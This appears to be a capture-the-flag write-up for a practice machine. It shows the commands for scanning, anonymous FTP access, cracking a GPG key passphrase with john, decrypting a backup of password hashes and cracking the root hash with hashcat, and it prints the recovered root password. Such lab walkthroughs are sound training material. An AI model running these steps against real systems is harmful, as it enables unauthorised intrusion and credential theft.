Initial Reconnaissance
Network scanning to identify available services:
nmap -v -sC -sV -oA nmap 10.10.177.146The scan revealed two accessible services: FTP and SSH.
FTP Enumeration
The FTP service allowed anonymous authentication. Connecting with default credentials granted access to user directories and system files:
ftp 10.10.177.146
anonymous:anonymousAfter exploring the filesystem, the user flag was located and retrieved from an accessible user directory.
Encrypted File Discovery
Continued enumeration revealed encrypted files in the root directory:
- A PGP backup file
- An associated ASCII key file
Both files were downloaded for offline analysis.
GPG Key Cracking
The private key was imported and converted for password cracking:
gpg --import private.asc
sudo gpg2john private.asc > privateBop
sudo john privateBopThis recovered the passphrase protecting the GPG key.
Backup Decryption
With the recovered passphrase, the backup file was decrypted:
gpg --decrypt backup.pgpThe decrypted content revealed system password hashes, including the root user's hash.
Root Password Cracking
echo '$6$07nYFaYf$F4VMaegmz7dKjsTukBLh6cP01iMmL7CiQDt1ycIm6a.bsOIBp0DwXVb9XI2EtULXJzBtaMZMNd2tV4uob5RVM0' > hash
hashcat -m 1800 hash --wordlist /usr/share/wordlists/rockyou.txt --forceThe recovered password was hikari.
SSH Access and Root Flag
ssh root@10.10.177.146With root access obtained, the final flag was retrieved from the system.